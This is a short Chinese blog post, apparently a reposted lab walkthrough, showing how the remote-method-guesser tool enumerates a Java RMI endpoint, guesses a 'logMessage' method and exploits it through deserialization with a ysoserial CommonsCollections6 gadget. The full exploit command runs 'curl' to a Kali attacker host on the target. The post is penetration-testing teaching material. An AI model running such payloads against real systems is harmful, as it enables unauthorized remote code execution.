打靶机的时候遇见的java扫描工具-rmg,链接如下
https://github.com/qtc-de/remote-method-guesser?tab=readme-ov-file#installation
remote-method-guesser (RMG) 是一种 Java RMI 漏洞扫描程序,可用于识别和验证 Java RMI 端点上的常见安全漏洞。
https://github.com/qtc-de/remote-method-guesser/releases
下好jar包直接用
./rmg-5.1.0-jar-with-dependencies.jar enum 192.168.x.x 1099
有个对象绑定到了MessengerService,通过暴力破解对象的任何公开方法进行调查:
./rmg-5.1.0-jar-with-dependencies.jar guess 192.168.x.x 1099
从输出中,我们注意到一个名为 `logMessage` 的方法,它接受一个对象作为第二个参数,由于 `RMI` 使用了反序列化,
因此远程应用程序在 Classpath 上可能有一个可用的反序列化工具,可以使用它:
link:https://github.com/frohoff/ysoserial.git
使用范例:
./rmg-5.1.0-jar-with-dependencies.jar serial 192.168.x.x 1099 CommonsCollections6 'curl you_kali_ip:9000/poc' --bound-name MessengerService --signature "int logMessage(int dummy1, Object dummy2)" --yso ysoserial-all.jar --position 1 --stack-trace
成功执行命令!
原文始发于微信公众号(道玄网安驿站):Java rmi扫描工具-RMG
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论